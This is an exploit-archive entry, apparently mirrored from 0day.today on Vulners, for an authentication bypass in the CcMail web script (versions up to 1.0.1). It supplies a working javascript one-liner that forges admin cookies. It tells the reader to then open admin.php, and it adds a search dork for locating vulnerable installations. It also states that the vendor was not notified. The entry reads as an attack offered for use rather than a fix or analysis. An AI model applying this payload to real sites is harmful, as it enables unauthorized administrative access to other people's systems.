Lucene search

K

CcMail <= 1.0.1 Insecure Cookie Handling Vulnerability

๐Ÿ—“๏ธย 12 Apr 2008ย 00:00:00Reported byย t0pP8uZzTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 65ย Views

CcMail <= 1.0.1 Insecure Cookie Handling Vulnerability allows remote attacker to set a cookie for admin acces

Show more
Code
======================================================
CcMail <= 1.0.1 Insecure Cookie Handling Vulnerability
======================================================




--==+================================================================================+==--
--==+		         CcMail <= 1.0.1 Insecure Cookie Handling	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 11 April 2008
Script Download: http://www.cicoandcico.com/download/download.php?SortBy=1&fdir=./ccmail/
DORK: "Emanuele Guadagnoli" "CcMail"

Vendor Has Not Been Notified!


DESCRIPTION: 
CcMail (all versions) suffers from insecure cookie handling, this allows the remote attacker to set a cookie
and be granted access to the admin area. this is because CcMail only checks if the cookie exists, it doesnt
compare the data.

by entering the below javascript into your (firefox/thunderbird etc) cookies will be created allowing you
to login to "admin.php"


Exploit:

javascript:document.cookie = "name=admin; path=/;"; document.cookie = "this_cookie=admin; path=/;"; 



NOTE/TIP: 
after running the above code you will be able to visit the admin area at "admin.php"



#  0day.today [2018-03-28]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Apr 2008 00:00Current
7.1High risk
Vulners AI Score7.1
65
.json
Report